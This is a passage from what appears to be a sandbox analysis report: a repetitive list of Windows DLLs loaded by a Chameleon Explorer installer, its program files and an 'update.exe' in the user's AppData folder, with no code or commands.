                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: globinputhost.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: sfc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: cscapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: netapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: wkscli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: acgenral.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: msacm32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: msvbvm60.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: vb6zz.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: version.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: shfolder.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: version.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: shfolder.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: version.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: olepro32.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: version.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: shfolder.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: symsrv.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: version.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: olepro32.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: folder.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: dlnashext.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wpdshext.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: networkexplorer.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: samlib.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: drprov.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: ntlanman.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: davclnt.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: davhlpr.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: playtodevice.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: devdispitemprovider.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: mmdevapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: devobj.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: portabledeviceapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: audiodev.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wmvcore.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wmasf.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: mfperfhelper.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: mscms.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: coloradapterclient.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: thumbcache.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: mrmcorer.dllJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exeSection loaded: apphelp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exeSection loaded: uxtheme.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exeSection loaded: folder64.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exeSection loaded: version.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exeSection loaded: netapi32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exeSection loaded: wkscli.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exeSection loaded: cscapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: version.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: mpr.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: shfolder.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: netapi32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wininet.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wsock32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: iphlpapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wkscli.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: cscapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: uxtheme.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wtsapi32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: winsta.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: propsys.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: windows.storage.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wldp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: profapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: sxs.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wbemcomn.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: napinsp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: pnrpnsp.dll
